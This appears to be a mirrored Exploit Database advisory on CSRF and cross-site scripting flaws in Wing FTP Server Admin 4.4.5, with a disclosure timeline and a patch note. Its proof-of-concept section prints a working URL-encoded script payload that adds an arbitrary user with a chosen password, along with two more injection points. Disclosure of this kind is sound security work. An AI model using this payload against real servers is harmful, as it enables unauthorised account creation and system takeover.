Wing FTP Server Admin 4.4.5 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： hyp3rlinx
  日期： 2015-04-29
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36861/

• Document Title:
  ===============
  Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities
  
  
  Release Date:
  =============
  2015-04-28
  
  
  apparitionsec ID (AS-ID):
  ====================================
  AS-WFTP0328
  
  
  Common Vulnerability Scoring System:
  ====================================
  Overall CVSS Score 8.9
  
  
  Product:
  ===============================
  Wing FTP Server is a Web based administration FTP client that supports
  following protocols FTP, FTPS, HTTPS, SSH
  
  
  
  Advisory Information:
  ==============================
  Security researcher John Page discovered a CSRF & client-side cross site
  scripting web vulnerability within Wing FTP Server Admin that allows adding
  arbitrary users to the system.
  
  
  
  Vulnerability Disclosure Timeline:
  ==================================
  March 28, 2015: Vendor Notification
  March 28, 2015: Vendor Response/Feedback
  April 19, 2015: Vendor Notification
  April 28, 2015: Vendor released newpatched version 4.4.6
  April 28, 2015: Public Disclosure - John Page
  
  
  
  Affected Product(s):
  ====================
  Wing FTP Server Admin 4.4.5
  Product: Wing FTP Server - Admin
  
  
  Exploitation Technique:
  =======================
  Remote
  
  
  Severity Level:
  ===============
  High
  
  
  Technical Details & Description:
  ================================
  
  
  Request Method(s):
  [+] POST & GET
  
  
  Vulnerable Product:
  [+] Wing FTP Server Admin 4.4.5
  
  
  Vulnerable Parameter(s):
  [+] domain & type
  
  
  Affected Area(s):
  [+] Server Admin
  
  
  Proof of Concept (POC):
  =======================
  The CSRF and client-side cross site scripting web vulnerability can be
  exploited by remote attackers without privileged application user account
  and with low user interaction (click). Payload will add arbitrary users to
  the system.
  
  POC: Example
  
  http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]
  
  POC: Payload(s) Add arbitrary user to the system:
  
  http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas
   ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
  
  
  POC XSS:
  http://localhost:5466/admin_viewstatus.html?domain=
  
  
  POC XSS:
  http://localhost:5466/admin_event_list.html?type=
  
  
  Solution - Fix & Patch:
  =======================
  Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)
  
  
  Security Risk:
  ==============
  The security risk of the CSRF client-side cross site scripting web
  vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9
  
  
  Credits & Authors:
  ==================
  John Page ( hyp3rlinx ) - ISR godz @apparitionsec
  
  
  Disclaimer & Information:
  =========================
  The information provided in this advisory is provided as it is without any
  warranty. the security research reporter John Page disclaims all
  warranties, either expressed or implied, including the warranties of
  merchantability and capability for a particular purpose. apparitionsec or
  its suppliers are not liable in any case of damage, including direct,
  indirect, incidental, consequential loss of business profits or special
  damages.
  
  Domains:hyp3rlinx.altervista.org